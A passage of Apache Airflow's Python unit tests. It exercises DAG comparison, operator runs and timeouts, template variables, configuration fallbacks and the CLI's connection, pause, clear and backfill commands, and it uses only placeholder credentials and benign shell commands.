self.assertIsNone(additional_dag_run)
def test_confirm_unittest_mod(self):
self.assertTrue(configuration.conf.get('core', 'unit_test_mode'))
def test_pickling(self):
dp = self.dag.pickle()
self.assertEqual(dp.pickle.dag_id, self.dag.dag_id)
def test_rich_comparison_ops(self):
class DAGsubclass(DAG):
pass
dag_eq = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_load_time = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_name = DAG(TEST_DAG_ID + '_neq', default_args=self.args)
dag_subclass = DAGsubclass(TEST_DAG_ID, default_args=self.args)
dag_subclass_diff_name = DAGsubclass(
TEST_DAG_ID + '2', default_args=self.args)
for d in [dag_eq, dag_diff_name, dag_subclass, dag_subclass_diff_name]:
d.last_loaded = self.dag.last_loaded
# test identity equality
self.assertEqual(self.dag, self.dag)
# test dag (in)equality based on _comps
self.assertEqual(dag_eq, self.dag)
self.assertNotEqual(dag_diff_name, self.dag)
self.assertNotEqual(dag_diff_load_time, self.dag)
# test dag inequality based on type even if _comps happen to match
self.assertNotEqual(dag_subclass, self.dag)
# a dag should equal an unpickled version of itself
d = pickle.dumps(self.dag)
self.assertEqual(pickle.loads(d), self.dag)
# dags are ordered based on dag_id no matter what the type is
self.assertLess(self.dag, dag_diff_name)
self.assertGreater(self.dag, dag_diff_load_time)
self.assertLess(self.dag, dag_subclass_diff_name)
# greater than should have been created automatically by functools
self.assertGreater(dag_diff_name, self.dag)
# hashes are non-random and match equality
self.assertEqual(hash(self.dag), hash(self.dag))
self.assertEqual(hash(dag_eq), hash(self.dag))
self.assertNotEqual(hash(dag_diff_name), hash(self.dag))
self.assertNotEqual(hash(dag_subclass), hash(self.dag))
def test_check_operators(self):
conn_id = "sqlite_default"
captainHook = BaseHook.get_hook(conn_id=conn_id)
captainHook.run("CREATE TABLE operator_test_table (a, b)")
captainHook.run("insert into operator_test_table values (1,2)")
t = CheckOperator(
task_id='check',
sql="select count(*) from operator_test_table",
conn_id=conn_id,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
t = ValueCheckOperator(
task_id='value_check',
pass_value=95,
tolerance=0.1,
conn_id=conn_id,
sql="SELECT 100",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
captainHook.run("drop table operator_test_table")
def test_clear_api(self):
task = self.dag_bash.tasks[0]
task.clear(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE,
upstream=True, downstream=True)
ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.are_dependents_done()
def test_illegal_args(self):
"""
Tests that Operators reject illegal arguments
"""
with warnings.catch_warnings(record=True) as w:
t = BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
self.assertTrue(
issubclass(w[0].category, PendingDeprecationWarning))
self.assertIn(
'Invalid arguments were passed to BashOperator.',
w[0].message.args[0])
def test_bash_operator(self):
t = BashOperator(
task_id='test_bash_operator',
bash_command="echo success",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_multi_byte_output(self):
t = BashOperator(
task_id='test_multi_byte_bash_operator',
bash_command=u"echo \u2600",
dag=self.dag,
output_encoding='utf-8')
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_kill(self):
import psutil
sleep_time = "100%d" % os.getpid()
t = BashOperator(
task_id='test_bash_operator_kill',
execution_timeout=timedelta(seconds=1),
bash_command="/bin/bash -c 'sleep %s'" % sleep_time,
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
sleep(2)
pid = -1
for proc in psutil.process_iter():
if proc.cmdline() == ['sleep', sleep_time]:
pid = proc.pid
if pid != -1:
os.kill(pid, signal.SIGTERM)
self.fail("BashOperator's subprocess still running after stopping on timeout!")
def test_trigger_dagrun(self):
def trigga(context, obj):
if True:
return obj
t = TriggerDagRunOperator(
task_id='test_trigger_dagrun',
trigger_dag_id='example_bash_operator',
python_callable=trigga,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_dryrun(self):
t = BashOperator(
task_id='test_dryrun',
bash_command="echo success",
dag=self.dag)
t.dry_run()
def test_sqlite(self):
import airflow.operators.sqlite_operator
t = airflow.operators.sqlite_operator.SqliteOperator(
task_id='time_sqlite',
sql="CREATE TABLE IF NOT EXISTS unitest (dummy VARCHAR(20))",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_timeout(self):
t = PythonOperator(
task_id='test_timeout',
execution_timeout=timedelta(seconds=1),
python_callable=lambda: sleep(5),
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_python_op(self):
def test_py_op(templates_dict, ds, **kwargs):
if not templates_dict['ds'] == ds:
raise Exception("failure")
t = PythonOperator(
task_id='test_py_op',
provide_context=True,
python_callable=test_py_op,
templates_dict={'ds': "{{ ds }}"},
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_complex_template(self):
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field['bar'][1],
context['ds'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field={
'foo': '123',
'bar': ['baz', '{{ ds }}']
},
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_variable(self):
"""
Test the availability of variables in templates
"""
val = {
'test_value': 'a test value'
}
Variable.set("a_variable", val['test_value'])
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable(self):
"""
Test the availability of variables (serialized as JSON) in templates
"""
val = {
'test_value': {'foo': 'bar', 'obj': {'v1': 'yes', 'v2': 'no'}}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value']['obj']['v2'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.json.a_variable.obj.v2 }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable_as_value(self):
"""
Test the availability of variables (serialized as JSON) in templates, but
accessed as a value
"""
val = {
'test_value': {'foo': 'bar'}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
u'{"foo": "bar"}')
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_non_bool(self):
"""
Test templates can handle objects with no sense of truthiness
"""
class NonBoolObject(object):
def __len__(self):
return NotImplemented
def __bool__(self):
return NotImplemented
t = OperatorSubclass(
task_id='test_bad_template_obj',
some_templated_field=NonBoolObject(),
dag=self.dag)
t.resolve_template_files()
def test_import_examples(self):
self.assertEqual(len(self.dagbag.dags), NUM_EXAMPLE_DAGS)
def test_local_task_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(task_instance=ti, ignore_ti_state=True)
job.run()
def test_raw_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
def test_doctests(self):
modules = [utils, macros]
for mod in modules:
failed, tests = doctest.testmod(mod)
if failed:
raise Exception("Failed a doctest")
def test_variable_set_get_round_trip(self):
Variable.set("tested_var_set_id", "Monday morning breakfast")
self.assertEqual("Monday morning breakfast", Variable.get("tested_var_set_id"))
def test_variable_set_get_round_trip_json(self):
value = {"a": 17, "b": 47}
Variable.set("tested_var_set_id", value, serialize_json=True)
self.assertEqual(value, Variable.get("tested_var_set_id", deserialize_json=True))
def test_get_non_existing_var_should_return_default(self):
default_value = "some default val"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value))
def test_get_non_existing_var_should_not_deserialize_json_default(self):
default_value = "}{ this is a non JSON default }{"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value,
deserialize_json=True))
def test_variable_setdefault_round_trip(self):
key = "tested_var_setdefault_1_id"
value = "Monday morning breakfast in Paris"
Variable.setdefault(key, value)
self.assertEqual(value, Variable.get(key))
def test_variable_setdefault_round_trip_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.setdefault(key, value, deserialize_json=True)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_setdefault_existing_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.set(key, value, serialize_json=True)
val = Variable.setdefault(key, value, deserialize_json=True)
# Check the returned value, and the stored value are handled correctly.
self.assertEqual(value, val)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_parameterized_config_gen(self):
cfg = configuration.parameterized_config(configuration.DEFAULT_CONFIG)
# making sure some basic building blocks are present:
self.assertIn("[core]", cfg)
self.assertIn("dags_folder", cfg)
self.assertIn("sql_alchemy_conn", cfg)
self.assertIn("fernet_key", cfg)
# making sure replacement actually happened
self.assertNotIn("{AIRFLOW_HOME}", cfg)
self.assertNotIn("{FERNET_KEY}", cfg)
def test_config_use_original_when_original_and_fallback_are_present(self):
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
configuration.conf.set("core", "FERNET_KEY_CMD", "printf HELLO")
FALLBACK_FERNET_KEY = configuration.conf.get(
"core",
"FERNET_KEY"
)
self.assertEqual(FERNET_KEY, FALLBACK_FERNET_KEY)
# restore the conf back to the original state
configuration.conf.remove_option("core", "FERNET_KEY_CMD")
def test_config_throw_error_when_original_and_fallback_is_absent(self):
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.conf.get("core", "FERNET_KEY")
configuration.conf.remove_option("core", "FERNET_KEY")
with self.assertRaises(AirflowConfigException) as cm:
configuration.conf.get("core", "FERNET_KEY")
exception = str(cm.exception)
message = "section/key [core/fernet_key] not found in config"
self.assertEqual(message, exception)
# restore the conf back to the original state
configuration.conf.set("core", "FERNET_KEY", FERNET_KEY)
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
def test_config_override_original_when_non_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = "some value"
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_config_override_original_when_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = ""
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_round_time(self):
rt1 = round_time(datetime(2015, 1, 1, 6), timedelta(days=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt1)
rt2 = round_time(datetime(2015, 1, 2), relativedelta(months=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt2)
rt3 = round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 16, 0, 0), rt3)
rt4 = round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 15, 0, 0), rt4)
rt5 = round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt5)
rt6 = round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt6)
def test_infer_time_unit(self):
self.assertEqual('minutes', infer_time_unit([130, 5400, 10]))
self.assertEqual('seconds', infer_time_unit([110, 50, 10, 100]))
self.assertEqual('hours', infer_time_unit([100000, 50000, 10000, 20000]))
self.assertEqual('days', infer_time_unit([200000, 100000]))
def test_scale_time_units(self):
# use assert_almost_equal from numpy.testing since we are comparing
# floating point arrays
arr1 = scale_time_units([130, 5400, 10], 'minutes')
assert_array_almost_equal(arr1, [2.167, 90.0, 0.167], decimal=3)
arr2 = scale_time_units([110, 50, 10, 100], 'seconds')
assert_array_almost_equal(arr2, [110.0, 50.0, 10.0, 100.0], decimal=3)
arr3 = scale_time_units([100000, 50000, 10000, 20000], 'hours')
assert_array_almost_equal(arr3, [27.778, 13.889, 2.778, 5.556],
decimal=3)
arr4 = scale_time_units([200000, 100000], 'days')
assert_array_almost_equal(arr4, [2.315, 1.157], decimal=3)
def test_duplicate_dependencies(self):
regexp = "Dependency (.*)runme_0(.*)run_after_loop(.*) " \
"already registered"
with self.assertRaisesRegexp(AirflowException, regexp):
self.runme_0.set_downstream(self.run_after_loop)
with self.assertRaisesRegexp(AirflowException, regexp):
self.run_after_loop.set_upstream(self.runme_0)
def test_bad_trigger_rule(self):
with self.assertRaises(AirflowException):
DummyOperator(
task_id='test_bad_trigger',
trigger_rule="non_existant",
dag=self.dag)
def test_terminate_task(self):
"""If a task instance's db state get deleted, it should fail"""
TI = models.TaskInstance
dag = self.dagbag.dags.get('test_utils')
task = dag.task_dict.get('sleeps_forever')
ti = TI(task=task, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(
task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
# Running task instance asynchronously
p = multiprocessing.Process(target=job.run)
p.start()
sleep(5)
settings.engine.dispose()
session = settings.Session()
ti.refresh_from_db(session=session)
# making sure it's actually running
self.assertEqual(State.RUNNING, ti.state)
ti = session.query(TI).filter_by(
dag_id=task.dag_id,
task_id=task.task_id,
execution_date=DEFAULT_DATE
).one()
# deleting the instance should result in a failure
session.delete(ti)
session.commit()
# waiting for the async task to finish
p.join()
# making sure that the task ended up as failed
ti.refresh_from_db(session=session)
self.assertEqual(State.FAILED, ti.state)
session.close()
def test_task_fail_duration(self):
"""If a task fails, the duration should be recorded in TaskFail"""
p = BashOperator(
task_id='pass_sleepy',
bash_command='sleep 3',
dag=self.dag)
f = BashOperator(
task_id='fail_sleepy',
bash_command='sleep 5',
execution_timeout=timedelta(seconds=3),
retry_delay=timedelta(seconds=0),
dag=self.dag)
session = settings.Session()
try:
p.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except:
pass
try:
f.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except:
pass
p_fails = session.query(models.TaskFail).filter_by(
task_id='pass_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
f_fails = session.query(models.TaskFail).filter_by(
task_id='fail_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
print(f_fails)
self.assertEqual(0, len(p_fails))
self.assertEqual(1, len(f_fails))
# C
self.assertGreaterEqual(sum([f.duration for f in f_fails]), 3)
def test_dag_stats(self):
"""Correctly sets/dirties/cleans rows of DagStat table"""
session = settings.Session()
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
models.DagStat.update([], session=session)
run1 = self.dag_bash.create_dagrun(
run_id="run1",
execution_date=DEFAULT_DATE,
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 1)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
run2 = self.dag_bash.create_dagrun(
run_id="run2",
execution_date=DEFAULT_DATE + timedelta(days=1),
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 2)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
session.query(models.DagRun).first().state = State.SUCCESS
session.commit()
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.SUCCESS).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.SUCCESS, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.RUNNING).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.RUNNING, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
session.close()
def test_run_command(self):
if six.PY3:
write = r'sys.stdout.buffer.write("\u1000foo".encode("utf8"))'
else:
write = r'sys.stdout.write(u"\u1000foo".encode("utf8"))'
cmd = 'import sys; {0}; sys.stdout.flush()'.format(write)
self.assertEqual(run_command("python -c '{0}'".format(cmd)),
u'\u1000foo' if six.PY3 else 'foo')
self.assertEqual(run_command('echo "foo bar"'), u'foo bar\n')
self.assertRaises(AirflowConfigException, run_command, 'bash -c "exit 1"')
class CliTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(CliTests, cls).setUpClass()
cls._cleanup()
def setUp(self):
super(CliTests, self).setUp()
configuration.load_test_config()
app = application.create_app()
app.config['TESTING'] = True
self.parser = cli.CLIFactory.get_parser()
self.dagbag = models.DagBag(dag_folder=DEV_NULL, include_examples=True)
self.session = Session()
def tearDown(self):
self._cleanup(session=self.session)
super(CliTests, self).tearDown()
@staticmethod
def _cleanup(session=None):
if session is None:
session = Session()
session.query(models.Pool).delete()
session.query(models.Variable).delete()
session.commit()
session.close()
def test_cli_list_dags(self):
args = self.parser.parse_args(['list_dags', '--report'])
cli.list_dags(args)
def test_cli_list_tasks(self):
for dag_id in self.dagbag.dags.keys():
args = self.parser.parse_args(['list_tasks', dag_id])
cli.list_tasks(args)
args = self.parser.parse_args([
'list_tasks', 'example_bash_operator', '--tree'])
cli.list_tasks(args)
@mock.patch("airflow.bin.cli.db_utils.initdb")
def test_cli_initdb(self, initdb_mock):
cli.initdb(self.parser.parse_args(['initdb']))
initdb_mock.assert_called_once_with(False)
@mock.patch("airflow.bin.cli.db_utils.resetdb")
def test_cli_resetdb(self, resetdb_mock):
cli.resetdb(self.parser.parse_args(['resetdb', '--yes']))
resetdb_mock.assert_called_once_with(False)
def test_cli_connections_list(self):
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(['connections', '--list']))
stdout = mock_stdout.getvalue()
conns = [[x.strip("'") for x in re.findall("'\w+'", line)[:2]]
for ii, line in enumerate(stdout.split('\n'))
if ii % 2 == 1]
conns = [conn for conn in conns if len(conn) > 0]
# Assert that some of the connections are present in the output as
# expected:
self.assertIn(['aws_default', 'aws'], conns)
self.assertIn(['beeline_default', 'beeline'], conns)
self.assertIn(['emr_default', 'emr'], conns)
self.assertIn(['mssql_default', 'mssql'], conns)
self.assertIn(['mysql_default', 'mysql'], conns)
self.assertIn(['postgres_default', 'postgres'], conns)
self.assertIn(['wasb_default', 'wasb'], conns)
# Attempt to list connections with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--list', '--conn_id=fake', '--conn_uri=fake-uri',
'--conn_type=fake-type', '--conn_host=fake_host',
'--conn_login=fake_login', '--conn_password=fake_password',
'--conn_schema=fake_schema', '--conn_port=fake_port', '--conn_extra=fake_extra']))
stdout = mock_stdout.getvalue()
# Check list attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--list flag: ['conn_id', 'conn_uri', 'conn_extra', " +
"'conn_type', 'conn_host', 'conn_login', " +
"'conn_password', 'conn_schema', 'conn_port']"),
])
def test_cli_connections_list_redirect(self):
cmd = ['airflow', 'connections', '--list']
with tempfile.TemporaryFile() as fp:
p = subprocess.Popen(cmd, stdout=fp)
p.wait()
self.assertEqual(0, p.returncode)
def test_cli_connections_add_delete(self):
# Add connections:
uri = 'postgresql://airflow:airflow@host:5432/airflow'
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new2',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new3',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new4',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new5',
'--conn_type=hive_metastore', '--conn_login=airflow',
'--conn_password=airflow', '--conn_host=host',
'--conn_port=9083', '--conn_schema=airflow']))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new6',
'--conn_uri', "", '--conn_type=google_cloud_platform', '--conn_extra', "{'extra': 'yes'}"]))
stdout = mock_stdout.getvalue()
# Check addition stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tSuccessfully added `conn_id`=new1 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new2 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new3 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new4 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new5 : " +
"hive_metastore://airflow:airflow@host:9083/airflow"),
("\tSuccessfully added `conn_id`=new6 : " +
"google_cloud_platform://:@:")
])
# Attempt to add duplicate
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tA connection with `conn_id`=new1 already exists",
])
# Attempt to add without providing conn_id
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_id']"),
])
# Attempt to add without providing conn_uri
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new']))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_uri or conn_type']"),
])
# Prepare to add connections
session = settings.Session()
extra = {'new1': None,
'new2': None,
'new3': "{'extra': 'yes'}",
'new4': "{'extra': 'yes'}"}
# Add connections
for index in range(1, 6):
conn_id = 'new%s' % index
result = (session
.query(models.Connection)
.filter(models.Connection.conn_id == conn_id)
.first())
result = (result.conn_id, result.conn_type, result.host,
result.port, result.get_extra())
if conn_id in ['new1', 'new2', 'new3', 'new4']:
self.assertEqual(result, (conn_id, 'postgres', 'host', 5432,
extra[conn_id]))
elif conn_id == 'new5':
self.assertEqual(result, (conn_id, 'hive_metastore', 'host',
9083, None))
elif conn_id == 'new6':
self.assertEqual(result, (conn_id, 'google_cloud_platform',
None, None, "{'extra': 'yes'}"))
# Delete connections
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new1']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new2']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new3']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new4']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new5']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new6']))
stdout = mock_stdout.getvalue()
# Check deletion stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tSuccessfully deleted `conn_id`=new1",
"\tSuccessfully deleted `conn_id`=new2",
"\tSuccessfully deleted `conn_id`=new3",
"\tSuccessfully deleted `conn_id`=new4",
"\tSuccessfully deleted `conn_id`=new5",
"\tSuccessfully deleted `conn_id`=new6"
])
# Check deletions
for index in range(1, 7):
conn_id = 'new%s' % index
result = (session.query(models.Connection)
.filter(models.Connection.conn_id == conn_id)
.first())
self.assertTrue(result is None)
# Attempt to delete a non-existing connnection
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tDid not find a connection with `conn_id`=fake",
])
# Attempt to delete with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake',
'--conn_uri=%s' % uri, '--conn_type=fake-type']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--delete flag: ['conn_uri', 'conn_type']"),
])
session.close()
def test_cli_test(self):
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0', '--dry_run',
DEFAULT_DATE.isoformat()]))
def test_cli_test_with_params(self):
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'also_run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
def test_cli_run(self):
cli.run(self.parser.parse_args([
'run', 'example_bash_operator', 'runme_0', '-l',
DEFAULT_DATE.isoformat()]))
def test_task_state(self):
cli.task_state(self.parser.parse_args([
'task_state', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
def test_dag_state(self):
self.assertEqual(None, cli.dag_state(self.parser.parse_args([
'dag_state', 'example_bash_operator', DEFAULT_DATE.isoformat()])))
def test_pause(self):
args = self.parser.parse_args([
'pause', 'example_bash_operator'])
cli.pause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [True, 1])
args = self.parser.parse_args([
'unpause', 'example_bash_operator'])
cli.unpause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [False, 0])
def test_subdag_clear(self):
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm'])
cli.clear(args)
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm', '--exclude_subdags'])
cli.clear(args)
def test_get_dags(self):
dags = cli.get_dags(self.parser.parse_args(['clear', 'example_subdag_operator', '-c']))
self.assertEqual(len(dags), 1)
dags = cli.get_dags(self.parser.parse_args(['clear', 'subdag', '-dx', '-c']))
self.assertGreater(len(dags), 1)
with self.assertRaises(AirflowException):
cli.get_dags(self.parser.parse_args(['clear', 'foobar', '-dx', '-c']))
def test_backfill(self):
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-t', 'runme_0', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-l',
'-s', DEFAULT_DATE.isoformat()]))
def test_process_subdir_path_with_placeholder(self):
self.assertEqual(os.path.join(settings.DAGS_FOLDER, 'abc'), cli.process_subdir('DAGS_FOLDER/abc'))
def test_trigger_dag(self):
cli.trigger_dag(self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'-c', '{"foo": "bar"}']))
self.assertRaises(
ValueError,
